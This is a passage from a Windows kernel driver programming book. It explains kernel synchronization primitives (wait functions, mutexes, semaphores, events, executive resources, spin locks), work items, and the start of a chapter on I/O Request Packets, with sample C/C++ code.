depends on the type of object. They are called “waitable” because a thread can wait on such objects until
they become signaled. While waiting, the thread does not consume CPU cycles as it’s in a Waiting state.
The primary functions used for waiting are KeWaitForSingleObject and KeWaitForMultipleOb-
jects. Their prototypes (with simplified SAL annotations for clarity) are shown below:
NTSTATUS KeWaitForSingleObject (
_In_ PVOID Object,
_In_ KWAIT_REASON WaitReason,
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout);
NTSTATUS KeWaitForMultipleObjects (
_In_ ULONG Count,
_In_reads_(Count) PVOID Object[],
_In_ WAIT_TYPE WaitType,
_In_ KWAIT_REASON WaitReason,
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER Timeout,
_Out_opt_ PKWAIT_BLOCK WaitBlockArray);
Here is a rundown of the arguments to these functions:
• Object - specifies the object to wait for. Note these functions work with objects, not handles. If you
have a handle (maybe provided by user mode), call ObReferenceObjectByHandle to get the
pointer to the object.
• WaitReason - specifies the wait reason. The list of wait reasons is pretty long, but drivers should
typically set it to Executive, unless it’s waiting because of a user request, and if so specify
UserRequest.
Chapter 6: Kernel Mechanisms
162
• WaitMode - can be UserMode or KernelMode. Most drivers should specify KernelMode.
• Alertable - indicates if the thread should be in an alertable state during the wait. Alertable state
allows delivering of user mode Asynchronous Procedure Calls (APCs). User mode APCs can be
delivered if wait mode is UserMode. Most drivers should specify FALSE.
• Timeout - specifies the time to wait. If NULL is specified, the wait is indefinite - as long as it takes for
the object to become signaled. The units of this argument are in 100nsec chunks, where a negative
number is relative wait, while a positive number is an absolute wait measured from January 1, 1601
at midnight.
• Count - the number of objects to wait on.
• Object[] - an array of object pointers to wait on.
• WaitType - specifies whether to wait for all object to become signaled at once (WaitAll) or just
one object (WaitAny).
• WaitBlockArray - an array of structures used internally to manage the wait operation. It’s optional if
the number of objects is <= THREAD_WAIT_OBJECTS (currently 3) - the kernel will use the built-in
array present in each thread. If the number of objects is higher, the driver must allocate the correct
size of structures from non-paged memory, and deallocate them after the wait is over.
The main return values from KeWaitForSingleObject are:
• STATUS_SUCCESS - the wait is satisfied because the object state has become signaled.
• STATUS_TIMEOUT - the wait is satisfied because the timeout has elapsed.
Note that all return values from the wait functions pass the NT_SUCCESS macro with true.
KeWaitForMultipleObjects return values include STATUS_TIMEOUT just as KeWaitForSingleOb-
ject. STATUS_SUCCESS is returned if WaitAll wait type is specified and all objects become signaled.
For WaitAny waits, if one of the objects became signaled, the return value is STATUS_WAIT_0 plus its
index in the array of objects (Note that STATUS_WAIT_0 is defined to be zero).
There are some fine details associated with the wait functions, especially if wait mode is
UserMode and the wait is alertable. Check the WDK docs for the details.
Table 6-3 lists some of the common dispatcher objects and the meaning of signaled and non-signaled for
these objects.
Chapter 6: Kernel Mechanisms
163
Table 6-3: Object Types and signaled meaning
Object Type
Signaled meaning
Non-Signaled meaning
Process
process has terminated (for whatever reason)
process has not terminated
Thread
thread has terminated (for whatever reason)
thread has not terminated
Mutex
mutex is free (unowned)
mutex is held
Event
event is set
event is reset
Semaphore
semaphore count is greater than zero
semaphore count is zero
Timer
timer has expired
timer has not yet expired
File
asynchronous I/O operation completed
asynchronous I/O operation is in progress
All the object types from table 6-3 are also exported to user mode. The primary waiting
functions in user mode are WaitForSingleObject and WaitForMultipleObjects.
The following sections will discuss some of common object types useful for synchronization in drivers.
Some other objects will be discussed as well that are not dispatcher objects, but support waiting as well.
Mutex
Mutex is the classic object for the canonical problem of one thread among many that can access a shared
resource at any one time.
Mutex is sometimes referred to as Mutant (its original name). These are the same thing.
A mutex is signaled when it’s free. Once a thread calls a wait function and the wait is satisfied, the mutex
becomes non-signaled and the thread becomes the owner of the mutex. Ownership is critical for a mutex.
It means the following:
• If a thread is the owner of a mutex, it’s the only one that can release the mutex.
• A mutex can be acquired more than once by the same thread. The second attempt succeeds
automatically since the thread is the current owner of the mutex. This also means the thread needs
to release the mutex the same number of times it was acquired; only then the mutex becomes free
(signaled) again.
Using a mutex requires allocating a KMUTEX structure from non-paged memory. The mutex API contains
the following functions working on that KMUTEX:
• KeInitializeMutex or KeInitializeMutant must be called once to initialize the mutex.
• One of the waiting functions, passing the address of the allocated KMUTEX structure.
• KeReleaseMutex is called when a thread that is the owner of the mutex wants to release it.
Here are the definitions of the APIs that can initialize a mutex:
Chapter 6: Kernel Mechanisms
164
VOID KeInitializeMutex (
_Out_ PKMUTEX Mutex,
_In_ ULONG Level);
VOID KeInitializeMutant (
// defined in ntifs.h
_Out_ PKMUTANT Mutant,
_In_ BOOLEAN InitialOwner);
The Level parameter in KeInitializeMutex is not used, so zero is a good value as any. KeIni-
tializeMutant allows specifying if the current thread should be the initial owner of the mutex.
KeInitializeMutex initializes the mutex to be unowned.
Releasing the mutex is done with KeReleaseMutex:
LONG KeReleaseMutex (
_Inout_ PKMUTEX Mutex,
_In_ BOOLEAN Wait);
The returned value is the previous state of the mutex object (including recursive ownership count), and
should mostly be ignored (although it may sometimes be useful for debugging purposes). The Wait
parameter indicates whether the next API call is going to be one of the wait functions. This is used as
a hint to the kernel that can optimize slightly if the thread is about to enter a wait state.
As part of calling KeReleaseMutex, the IRQL is raised to DISPATCH_LEVEL. If
Wait is TRUE, the IRQL is not lowered, which would allow the next wait function
(KeWaitForSingleObject or KeWaitForSingleObject) to execute more efficiently, as
no context switch can interfere.
Given the above functions, here is an example using a mutex to access some shared data so that only a
single thread does so at a time:
KMUTEX MyMutex;
LIST_ENTRY DataHead;
void Init() {
KeInitializeMutex(&MyMutex, 0);
}
void DoWork() {
// wait for the mutex to be available
KeWaitForSingleObject(&MyMutex, Executive, KernelMode, FALSE, nullptr);
// access DataHead freely
Chapter 6: Kernel Mechanisms
165
// once done, release the mutex
KeReleaseMutex(&MyMutex, FALSE);
}
It’s important to release the mutex no matter what, so it’s better to use __try / __finally to make sure
it’s executed however the __try block is exited:
void DoWork() {
// wait for the mutex to be available
KeWaitForSingleObject(&MyMutex, Executive, KernelMode, FALSE, nullptr);
__try {
// access DataHead freely
}
__finally {
// once done, release the mutex
KeReleaseMutex(&MyMutex, FALSE);
}
}
Figure 6-10 shows two threads attempting to acquire the mutex at roughly the same time, as they want to
access the same data. One thread succeeds in acquiring the mutex, the other has to wait until the mutex
is released by the owner before it can acquire it.
Chapter 6: Kernel Mechanisms
166
Figure 6-10: Acquiring a mutex
Since using __try/__finally is a bit awkward, we can use C++ to create a RAII wrapper for waits. This
could also be used for other synchronization primitives.
First, we’ll create a mutex wrapper that provides functions named Lock and Unlock:
struct Mutex {
void Init() {
KeInitializeMutex(&_mutex, 0);
}
void Lock() {
KeWaitForSingleObject(&_mutex, Executive, KernelMode, FALSE, nullptr);
}
void Unlock() {
Chapter 6: Kernel Mechanisms
167
KeReleaseMutex(&_mutex, FALSE);
}
private:
KMUTEX _mutex;
};
Then we can create a generic RAII wrapper for waiting for any type that has a Lock and Unlock functions:
template<typename TLock>
struct Locker {
explicit Locker(TLock& lock) : _lock(lock) {
lock.Lock();
}
~Locker() {
_lock.Unlock();
}
private:
TLock& _lock;
};
With these definitions in place, we can replace the code using the mutex with the following:
Mutex MyMutex;
void Init() {
MyMutex.Init();
}
void DoWork() {
Locker<Mutex> locker(MyMutex);
// access DataHead freely
}
Chapter 6: Kernel Mechanisms
168
Since locking should be done for the shortest time possible, you can use an artificial C/C++
scope containing Locker and the code to execute while the mutex is owned, to acquire the
mutex as late as possible and release it as soon as possible.
With C++ 17 and later, Locker can be used without specifying the type like so:
Locker locker(MyMutex);
Since Visual Studio currently uses C++ 14 as its default language standard, you’ll have to change
that in the project properties under the General node / C++ Language Standard.
We’ll use the same Locker type with other synchronization primitives in subsequent sections.
Abandoned Mutex
A thread that acquires a mutex becomes the mutex owner. The owner thread is the only one that can
release the mutex. What happens to the mutex if the owner thread dies for whatever reason? The mutex
then becomes an abandoned mutex. The kernel explicitly releases the mutex (as no thread can do it) to
prevent a deadlock, so another thread would be able to acquire that mutex normally. However, the returned
value from the next successful wait call is STATUS_ABANDONED rather than STATUS_SUCCESS. A driver
should log such an occurrence, as it frequently indicates a bug.
Other Mutex Functions
Mutexes support a few miscellaneous functions that may be useful at times, mostly for debugging purposes.
KeReadStateMutex returns the current state (recursive count) of the mutex, where 0 means “unowned”:
LONG KeReadStateMutex (_In_ PKMUTEX Mutex);
Just remember that after the call returns, the result may no longer be correct as the mutex state may have
changed because some other thread has acquired or released the mutex before the code gets to examine
the result. The benefit of this function is in debugging scenarios only.
You can get the current mutex owner with a call to KeQueryOwnerMutant (defined in <ntifs.h>) as a
CLIENT_ID data structure, containing the thread and process IDs:
VOID KeQueryOwnerMutant (
_In_ PKMUTANT Mutant,
_Out_ PCLIENT_ID ClientId);
Just like with KeReadStateMutex, the returned information may be stale if other threads are doing work
with that mutex.
Chapter 6: Kernel Mechanisms
169
Fast Mutex
A fast mutex is an alternative to the classic mutex, providing better performance. It’s not a dispatcher
object, and so has its own API for acquiring and releasing it. A fast mutex has the following characteristics
compared with a regular mutex:
• A fast mutex cannot be acquired recursively. Doing so causes a deadlock.
• When a fast mutex is acquired, the CPU IRQL is raised to APC_LEVEL (1). This prevents any delivery
of APCs to that thread.
• A fast mutex can only be waited on indefinitely - there is no way to specify a timeout.
Because of the first two bullets above, the fast mutex is slightly faster than a regular mutex. In fact, most
drivers requiring a mutex use a fast mutex unless there is a compelling reason to use a regular mutex.
Don’t use I/O operations while holding on to a fast mutex. I/O completions are delivered with
a special kernel APC, but those are blocked while holding a fast mutex, creating a deadlock.
A fast mutex is initialized by allocating a FAST_MUTEX structure from non-paged memory and calling
ExInitializeFastMutex. Acquiring the mutex is done with ExAcquireFastMutex or ExAcquire-
FastMutexUnsafe (if the current IRQL happens to be APC_LEVEL already). Releasing a fast mutex is
accomplished with ExReleaseFastMutex or ExReleaseFastMutexUnsafe.
Semaphore
The primary goal of a semaphore is to limit something, such as the length of a queue. The semaphore
is initialized with its maximum and initial count (typically set to the maximum value) by calling
KeInitializeSemaphore. While its internal count is greater than zero, the semaphore is signaled. A
thread that calls KeWaitForSingleObject has its wait satisfied, and the semaphore count drops by one.
This continues until the count reaches zero, at which point the semaphore becomes non-signaled.
Semaphores use the KSEMAPHORE structure to hold their state, which must be allocated from non-paged
memory. Here is the definition of KeInitializeSemaphore:
VOID KeInitializeSemaphore (
_Out_ PRKSEMAPHORE Semaphore,
_In_ LONG Count,
// starting count
_In_ LONG Limit);
// maximum count
As an example, imagine a queue of work items managed by the driver. Some threads want to add items to
the queue. Each such thread calls KeWaitForSingleObject to obtain one “count” of the semaphore. As
long as the count is greater than zero, the thread continues and adds an item to the queue, increasing its
length, and semaphore “loses” a count. Some other threads are tasked with processing work items from the
queue. Once a thread removes an item from the queue, it calls KeReleaseSemaphore that increments
the count of the semaphore, moving it to the signaled state again, allowing potentially another thread to
make progress and add a new item to the queue.
KeReleaseSemaphore is defined like so:
Chapter 6: Kernel Mechanisms
170
LONG KeReleaseSemaphore (
_Inout_ PRKSEMAPHORE Semaphore,
_In_ KPRIORITY Increment,
_In_ LONG Adjustment,
_In_ BOOLEAN Wait);
The Increment parameter indicates the priority boost to apply to the thread that has a successful waiting
on the semaphore. The details of how this boost works are described in the next chapter. Most drivers
should provide the value 1 (that’s the default used by the kernel when a semaphore is released by the
user mode ReleaseSemaphore API). Adjustment is the value to add to the semaphore’s current count.
It’s typically one, but can be a higher value if that makes sense. The last parameter (Wait) indicates
whether a wait operation (KeWaitForSingleObject or KeWaitFOrMultipleObjects) immediately
follows (see the information bar in the mutex discussion above). The function returns the old count of the
semaphore.
Is a semaphore with a maximum count of one equivalent to a mutex? At first, it seems so,
but this is not the case. A semaphore lacks ownership, meaning one thread can acquire the
semaphore, while another can release it. This is a strength, not a weakness, as described in the
above example. A Semaphore’s purpose is very different from that of a mutex.
You can read the current count of the semaphore by calling KeReadStateSemaphore:
LONG KeReadStateSemaphore (_In_ PRKSEMAPHORE Semaphore);
Event
An event encapsulates a boolean flag - either true (signaled) or false (non-signaled). The primary purpose
of an event is to signal something has happened, to provide flow synchronization. For example, if some
condition becomes true, an event can be set, and a bunch of threads can be released from waiting and
continue working on some data that perhaps is now ready for processing.
The are two types of events, the type being specified at event initialization time:
• Notification event (manual reset) - when this event is set, it releases any number of waiting threads,
and the event state remains set (signaled) until explicitly reset.
• Synchronization event (auto reset) - when this event is set, it releases at most one thread (no matter
how many are waiting for the event), and once released the event goes back to the reset (non-
signaled) state automatically.
An event is created by allocating a KEVENT structure from non-paged memory and then calling
KeInitializeEvent to initialize it, specifying the event type (NotificationEvent or Synchro-
nizationEvent) and the initial event state (signaled or non-signaled):
Chapter 6: Kernel Mechanisms
171
VOID KeInitializeEvent (
_Out_ PRKEVENT Event,
_In_ EVENT_TYPE Type,
// NotificationEvent or SynchronizationEvent
_In_ BOOLEAN State);
// initial state (signaled=TRUE)
Notification events are called Manual-reset in user-mode terminology, while Synchronization events are
called Auto-reset. Despite the name changes, these are the same.
Waiting for an event is done normally with the KeWaitXxx functions. Calling KeSetEvent sets the event
to the signaled state, while calling KeResetEvent or KeClearEvent resets it (non-signaled state) (the
latter function being a bit quicker as it does not return the previous state of the event):
LONG KeSetEvent (
_Inout_ PRKEVENT Event,
_In_ KPRIORITY Increment,
_In_ BOOLEAN Wait);
VOID KeClearEvent (_Inout_ PRKEVENT Event);
LONG KeResetEvent (_Inout_ PRKEVENT Event);
Just like with a semaphore, setting an event allows providing a priority boost to the next successful wait
on the event.
Finally, The current state of an event (signaled or non-signaled) can be read with KeReadStateEvent:
LONG KeReadStateEvent (_In_ PRKEVENT Event);
Named Events
Event objects can be named (as can mutexes and semaphores). This can be used as an easy way
of sharing an event object with other drivers or with user-mode clients. One way of creating or
opening a named event by name is with the helper functions IoCreateSynchronizationEvent and
IoCreateNotificationEvent APIs:
PKEVENT IoCreateSynchronizationEvent(
_In_
PUNICODE_STRING EventName,
_Out_ PHANDLE EventHandle);
PKEVENT IoCreateNotificationEvent(
_In_
PUNICODE_STRING EventName,
_Out_ PHANDLE EventHandle);
Chapter 6: Kernel Mechanisms
172
These APIs create the named event object if it does not exist and set its state to signaled, or obtain another
handle to the named event if it does exist. The name itself is provided as a normal UNICODE_STRING and
must be a full path in the Object Manager’s namespace, as can be observed in the Sysinternals WinObj
tool.
These APIs return two values: the pointer to the event object (direct returned value) and an open handle in
the EventHandle parameter. The returned handle is a kernel handle, to be used by the driver only. The
functions return NULL on failure.
You can use the previously described events API to manipulate the returned event by address. Don’t
forget to close the returned handle (ZwClose) to prevent a leak. Alternatively, you can call ObRefer-
enceObject on the returned pointer to make sure it’s not prematurely destroyed and close the handle
immediately. In that case, call ObDereferenceObject when you’re done with the event.
Built-in Named Kernel Events
One use of the IoCreateNotificationEvent API is to gain access to a bunch of named event objects
the kernel provides in the \KernelObejcts directory. These events provide various notifications for memory
related status, that may be useful for kernel drivers.
Figure 6-11 shows the named events in WinObj. Note that the lower symbolic links are actually events, as
these are internally implemented as Dynamic Symbolic Links (see more details at https://scorpiosoftware.
net/2021/04/30/dynamic-symbolic-links/).
Figure 6-11: Kernel Named Events
Chapter 6: Kernel Mechanisms
173
All the events shown in figure 6-11 are Notification events. Table 6-5 lists these events with their meaning.
Table 6-5: Named kernel events
Name
Description
HighMemoryCondition
The system has lots of free physical memory
LowMemoryCondition
The system is low on physical memory
HighPagedPoolCondition
The system has lots of free paged pool memory
LowPagedPoolCondition
The system is low on paged pool memory
HighNonPagedPoolCondition
The system has lots of free non-paged pool memory
LowNonPagedPoolCondition
The system is low on non-paged pool memory
HighCommitCondition
The system has lots of free memory in RAM and paging file(s)
LowCommitCondition
The system is low on RAM and paging file(s)
MaximumCommitCondition
The system is almost out of memory, and no further increase in page files size is
possible
Drivers can use these events as hints to either allocate more memory or free memory as required. The
following example shows how to obtain one of these events and wait for it on some thread (error handling
ommitted):
UNICODE_STRING name;
RtlInitUnicodeString(&name, L"\\KernelObjects\\LowCommitCondition");
HANDLE hEvent;
auto event = IoCreateNotificationEvent(&name, &hEvent);
// on some driver-created thread...
KeWaitForSingleObject(event, Executive, KernelMode, FALSE, nullptr);
// free some memory if possible...
//
// close the handle
ZwClose(hEvent);
Write a driver that waits on all these named events and uses DbgPrint to indicate a signaled
event with its description.
Executive Resource
The classic synchronization problem of accessing a shared resource by multiple threads was dealt with by
using a mutex or fast mutex. This works, but mutexes are pessimistic, meaning they allow a single thread
Chapter 6: Kernel Mechanisms
174
to access a shared resource. That may be unfortunate in cases where multiple threads access a shared
resource by reading only.
In cases where it’s possible to distinguish data changes (writes) vs. just looking at the data (reading)
- there is a possible optimization. A thread that requires access to the shared resource can declare its
intentions - read or write. If it declares read, other threads declaring read can do so concurrently, improving
performance. This is especially useful if the shared data changes infrequently, i.e. there are considerably
more reads than writes.
Mutexes by their very nature are pessimistic locks, since they enforce a single thread at a time execution.
This makes them always work at the expense of possible performance gains with concurrency.
The kernel provides yet another synchronization primitive that is geared towards this scenario, known as
single writer, multiple readers. This object is the Executive Resource, another special object which is not a
dispatcher object.
Initializing an executive resource is done by allocating an ERESOURCE structure from non-paged pool
and calling ExInitializeResourceLite. Once initialized, threads can acquire either the exclusive
lock (for writes) using ExAcquireResourceExclusiveLite or the shared lock by calling ExAc-
quireResourceSharedLite. Once done the work, a thread releases the executive resource with
ExReleaseResourceLite (no matter whether it acquired as exclusive or not).
The requirement for using the acquire and release functions is that normal kernel APCs must be
disabled. This can be done with KeEnterCtriticalRegion just before the acquire call, and then
KeLeaveCriticalRegion just after the release call. The following code snippet demonstrates that:
ERESOURCE resource;
void WriteData() {
KeEnterCriticalRegion();
ExAcquireResourceExclusiveLite(&resource, TRUE);
// wait until acquired
// Write to the data
ExReleaseResourceLite(&resource);
KeLeaveCriticalRegion();
}
Since these calls are so common when working with executive resources, there are functions that perform
both operations with a single call:
Chapter 6: Kernel Mechanisms
175
void WriteData() {
ExEnterCriticalRegionAndAcquireResourceExclusive(&resource);
// Write to the data
ExReleaseResourceAndLeaveCriticalRegion(&resource);
}
A similar function exists for shared acquisition, ExEnterCriticalRegionAndAcquireResource-
Shared. Finally, before freeing the memory the resource occupies, call ExDeleteResourceLite to
remove the resource from the kernel’s resource list:
NTSTATUS ExDeleteResourceLite(
_Inout_ PERESOURCE Resource);
You can query the number of waiting threads for exclusive and shared access of a resource with the
functions ExGetExclusiveWaiterCount and ExGetSharedWaiterCount, respectively.
There are other functions for working with executive resources for some specialized cases. Consult the
WDK documentation for more information.
Create appropriate C++ RAII wrappers for executive resources.
High IRQL Synchronization
The sections on synchronization so far have dealt with threads waiting for various types of objects. How-
ever, in some scenarios, threads cannot wait - specifically, when the processor’s IRQL is DISPATCH_LEVEL
(2) or higher. This section discusses these scenarios and how to handle them.
Let’s examine an example scenario: A driver has a timer, set up with KeSetTimer and uses a DPC to
execute code when the timer expires. At the same time, other functions in the driver, such an IRP_MJ_-
DEVICE_CONTROL may execute at the same time (runs at IRQL 0). If both these functions need to access
a shared resource (e.g. a linked list), they must synchronize access to prevent data corruption.
The problem is that a DPC cannot call KeWaitForSingleObject or any other waiting function - calling
any of these is fatal. So how can these functions synchronize access?
The simple case is where the system has a single CPU. In this case, when accessing the shared resource, the
low IRQL function just needs to raise IRQL to DISPATCH_LEVEL and then access the resource. During
Chapter 6: Kernel Mechanisms
176
that time a DPC cannot interfere with this code since the CPU’s IRQL is already 2. Once the code is done
with the shared resource, it can lower the IRQL back to zero, allowing the DPC to execute. This prevents
execution of these routines at the same time. Figure 6-12 shows this setup.
Figure 6-12: High-IRQL synchronization by manipulating IRQL
In standard systems, where there is more than one CPU, this synchronization method is not enough,
because the IRQL is a CPU’s property, not a system-wide property. If one CPU’s IRQL is raised to 2, if a
DPC needs to execute, it can execute on another CPU whose IRQL may be zero. In this case, it’s possible
that both functions execute at the same time, accessing the shared data, causing a data race.
How can we solve that? We need something like a mutex, but that can synchronize between processors -
not threads. That’s because when the CPU’s IRQL is 2 or higher, the thread itself loses meaning because
the scheduler cannot do work on that CPU. This kind of object exists - the Spin Lock.
Chapter 6: Kernel Mechanisms
177
The Spin Lock
The Spin Lock is just a bit in memory that is used with atomic test-and-set operations via an API. When
a CPU tries to acquire a spin lock, and that spin lock is not currently free (the bit is set), the CPU keeps
spinning on the spin lock, busy waiting for it to be released by another CPU (remember, putting the thread
into a waiting state cannot be done at IRQL DISPATCH_LEVEL or higher).
In the scenario depicted in the previous section, a spin lock would need to be allocated and initialized. Each
function that requires access to the shared data needs to raise IRQL to 2 (if not already there), acquire the
spin lock, perform the work on the shared data, and finally release the spin lock and lower IRQL back (if
applicable; not so for a DPC). This chain of events is depicted in figure 6-13.
Creating a spin lock requires allocating a KSPIN_LOCK structure from non-paged pool, and calling
KeInitializeSpinLock. This puts the spin lock in the unowned state.
Chapter 6: Kernel Mechanisms
178
Figure 6-13: High-IRQL synchronization with a Spin Lock
Acquiring a spin lock is always a two-step process: first, raise the IRQL to the proper level, which is the
highest level of any function trying to synchronize access to a shared resource. In the previous example, this
associated IRQL is 2. Second, acquire the spin lock. These two steps are combined by using the appropriate
API. This process is depicted in figure 6-14.
Chapter 6: Kernel Mechanisms
179
Figure 6-14: Acquiring a Spin Lock
Acquiring and releasing a spin lock is done using an API that performs the two steps outlined in figure
6-12. Table 6-4 shows the relevant APIs and the associated IRQL for the spin locks they operate on.
Table 6-4: APIs for working with spin locks
IRQL
Acquire function
Release function
Remarks
DISPATCH_LEVEL (2)
KeAcquireSpinLock
KeReleaseSpinLock
DISPATCH_LEVEL (2)
KeAcquireSpinLockAtDpcLevel KeReleaseSpinLockFromDpcLevel
(a)
Device IRQL
KeAcquireInterruptSpinLock
KeReleaseInterruptSpinLock
(b)
Device IRQL
KeSynchronizeExecution
(none)
(c)
HIGH_LEVEL
ExInterlockedXxx
(none)
(d)
Remarks on table 6-4:
(a) Can be called at IRQL 2 only. Provides an optimization that just acquires the spin lock without changing
IRQLs. The canonical scenario is calling these APIs within a DPC routine.
(b) Useful for synchronizing an ISR with any other function. Hardware-based drivers with an interrupt
source use these routines. The argument is an interrupt object (KINTERRUPT), where the spin lock is part
of it.
(c) KeSynchronizeExecution acquires the interrupt object spin lock, calls the porovided callback and
releases the spin lock. The net effect is the same as calling the pair KeAcquireInterruptSpinLock /
Chapter 6: Kernel Mechanisms
180
KeReleaseInterruptSpinLock.
(d) A set of three functions for manipulating LIST_ENTRY-based linked lists. These functions use the
provided spin lock and raise IRQL to HIGH_LEVEL. Because of the high IRQL, these routines can be used
in any IRQL, since raising IRQL is always a safe operation.
If you acquire a spin lock, be sure to release it in the same function. Otherwise, you’re risking
a deadlock or a system crash.
Where do spin locks come from? The scenario described here requires the driver to allocate its
own spin lock to protect concurrent access to its own data from high-IRQL functions. Some spin
locks exist as part of other objects, such as the KINTERRUPT object used by hardware-based
drivers that handle interrupts. Another example is a system-wide spin lock known as the Cancel
spin lock, which is acquired by the kernel before calling a cancellation routine registered by a
driver. This is the only case where a driver released a spin lock it has not acquired explicitly.
If several CPUs try to acquire the same spin lock at the same time, which CPU gets the spin lock
first? Normally, there is no order - the CPU with fastest electrons wins :). The kernel does pro-
vide an alternative, called Queued spin locks that serve CPUs on a FIFO basis. These only work
with IRQL DISPATCH_LEVEL. The relevant APIs are KeAcquireInStackQueuedSpinLock
and KeReleaseInStackQueuedSpinLock. Check the WDK documentation for more de-
tails.
Write a C++ wrapper for a DISPATCH_LEVEL spin lock that works with the Locker RAII class
defined earlier in this chapter.
Queued Spin Locks
A variant on classic spin locks are queued spin locks. These behave the same as normal spin locks, with
the following differences:
• Queued spin locks always raise to IRQL DISPTACH_LEVEL (2). This means they cannot be used for
synchronizing with an ISR, for example.
• There is a queue of CPU waiting to acquire the spin lock, on a FIFO basis. This is more efficient when
high contention is expected. Normal spin locks provide no gauarantee as to the order of acquisition
when multiple CPUs attempt to acquire a spin lock.
A queued spin lock is initialized just like a normal spin lock (KeInitializeSpinLock). Acquiring and
releasing a queued spin lock is achieved with different APIs:
Chapter 6: Kernel Mechanisms
181
void KeAcquireInStackQueuedSpinLock (
_Inout_ PKSPIN_LOCK SpinLock,
_Out_ PKLOCK_QUEUE_HANDLE LockHandle);
void KeReleaseInStackQueuedSpinLock (
_In_ PKLOCK_QUEUE_HANDLE LockHandle);
Except for a spin lock, the caller provides an opaque KLOCK_QUEUE_HANDLE structure that is filled in by
KeAcquireInStackQueuedSpinLock. The same one must be passed to KeReleaseInStackQueued-
SpinLock.
Just like with normal dispatch-level spin locks, shortcuts exist if the caller is already at IRQL DIS-
PATCH_LEVEL. KeAcquireInStackQueuedSpinLockAtDpcLevel acquires the spin lock with no
IRQL changes, while KeReleaseInStackQueuedSpinLockFromDpcLevel releases it.
Write a C++ RAII wrapper for a queued spin lock.
Work Items
Sometimes there is a need to run a piece of code on a different thread than the executing one. One
way to do that is to create a thread explicitly and task it with running the code. The kernel provides
functions that allow a driver to create a separate thread of execution: PsCreateSystemThread and
IoCreateSystemThread (available in Windows 8+). These functions are appropriate if the driver needs
to run code in the background for a long time. However, for time-bound operations, it’s better to use a
kernel-provided thread pool that will execute your code on some system worker thread.
PsCreateSystemThread and IoCreateSystemThread are discussed in chapter 8.
IoCreateSystemThread is preferred over PsCreateSystemThread, because is allows
associating a device or driver object with the thread. This makes the I/O system add a reference
to the object, which makes sure the driver cannot be unloaded prematurely while the thread is
still executing.
A
driver-created
thread
must
terminate
itself
eventually
by
calling
PsTerminateSystemThread. This function never returns if successful.
Work items is the term used to describe functions queued to the system thread pool. A driver can allocate
and initialize a work item, pointing to the function the driver wishes to execute, and then the work item
can be queued to the pool. This may seem very similar to a DPC, the primary difference being work items
Chapter 6: Kernel Mechanisms
182
always execute at IRQL PASSIVE_LEVEL (0). Thus, work items can be used by IRQL 2 code (such as
DPCs) to perform operations not normally allowed at IRQL 2 (such as I/O operations).
Creating and initializing a work item can be done in one of two ways:
• Allocate and initialize the work item with IoAllocateWorkItem. The function returns a pointer
to the opaque IO_WORKITEM. When finished with the work item it must be freed with IoFree-
WorkItem.
• Allocate an IO_WORKITEM structure dynamically with size provided by IoSizeofWorkItem.
Then call IoInitializeWorkItem. When finished with the work item, call IoUninitialize-
WorkItem.
These functions accept a device object, so make sure the driver is not unloaded while there is a work item
queued or executing.
There is another set of APIs for work items, all start with Ex, such as ExQueueWorkItem.
These functions do not associate the work item with anything in the driver, so it’s possible
for the driver to be unloaded while a work item is still executing. These APIs are marked as
deprecated - always prefer using the Io functions.
To queue the work item, call IoQueueWorkItem. Here is its definition:
viud IoQueueWorkItem(
_Inout_ PIO_WORKITEM IoWorkItem,
// the work item
_In_ PIO_WORKITEM_ROUTINE WorkerRoutine,
// the function to be called
_In_ WORK_QUEUE_TYPE QueueType,
// queue type
_In_opt_ PVOID Context);
// driver-defined value
The callback function the driver needs to provide has the following prototype:
IO_WORKITEM_ROUTINE WorkItem;
void WorkItem(
_In_
PDEVICE_OBJECT DeviceObject,
_In_opt_ PVOID
Context);
The system thread pool has several queues (at least logically), based on the thread priorities that serve
these work items. There are several levels defined:
Chapter 6: Kernel Mechanisms
183
typedef enum _WORK_QUEUE_TYPE {
CriticalWorkQueue,
// priority 13
DelayedWorkQueue,
// priority 12
HyperCriticalWorkQueue,
// priority 15
NormalWorkQueue,
// priority 8
BackgroundWorkQueue,
// priority 7
RealTimeWorkQueue,
// priority 18
SuperCriticalWorkQueue,
// priority 14
MaximumWorkQueue,
CustomPriorityWorkQueue = 32
} WORK_QUEUE_TYPE;
The documentation indicates DelayedWorkQueue must be used, but in reality, any other supported level
can be used.
There is another function that can be used to queue a work item: IoQueueWorkItemEx. This
function uses a different callback that has an added parameter which is the work item itself.
This is useful if the work item function needs to free the work item before it exits.
Summary
In this chapter, we looked at various kernel mechanisms driver developers should be aware of and use. In
the next chapter, we’ll take a closer look at I/O Request Packets (IRPs).
Chapter 7: The I/O Request Packet
After a typical driver completes its initialization in DriverEntry, its primary job is to handle requests.
These requests are packaged as the semi-documented I/O Request Packet (IRP) structure. In this chapter,
we’ll take a deeper look at IRPs and how a driver handles common IRP types.
In This chapter:
• Introduction to IRPs
• Device Nodes
• IRP and I/O Stack Location
• Dispatch Routines
• Accessing User Buffers
• Putting it All Together: The Zero Driver
Introduction to IRPs
An IRP is a structure that is allocated from non-paged pool typically by one of the “managers” in the
Executive (I/O Manager, Plug & Play Manager, Power Manager), but can also be allocated by the driver,
perhaps for passing a request to another driver. Whichever entity allocating the IRP is also responsible for
freeing it.
An IRP is never allocated alone. It’s always accompanied by one or more I/O Stack Location structures
(IO_STACK_LOCATION). In fact, when an IRP is allocated, the caller must specify how many I/O stack
locations need to be allocated with the IRP. These I/O stack locations follow the IRP directly in memory.
The number of I/O stack locations is the number of device objects in the device stack. We’ll discuss
device stacks in the next section. When a driver receives an IRP, it gets a pointer to the IRP structure
itself, knowing it’s followed by a set of I/O stack location, one of which is for the driver’s use. To get the
correct I/O stack location, a driver calls IoGetCurrentIrpStackLocation (actually a macro). Figure
7-1 shows a conceptual view of an IRP and its associated I/O stack locations.
Chapter 7: The I/O Request Packet
185
Figure 7-1: IRP and its I/O stack locations
The parameters of the request are somehow “split” between the main IRP structure and the current IO_-
STACK_LCATION.
Device Nodes
The I/O system in Windows is device-centric, rather than driver-centric. This has several implications:
• Device objects can be named, and handles to device objects can be opened. The CreateFile
function accepts a symbolic link that leads to a device object. CreateFile cannot accept a driver’s
name as an argument.
• Windows supports device layering - one device can be layered on top of another. Any request
destined for a lower device will reach the uppermost device first. This layering is common for
hardware-based devices, but it works with any device type.
Figure 7-2 shows an example of several layers of devices, “stacked” one on top of the other. This set of
devices is known as a device stack, sometimes referred to as device node (although the term device node is
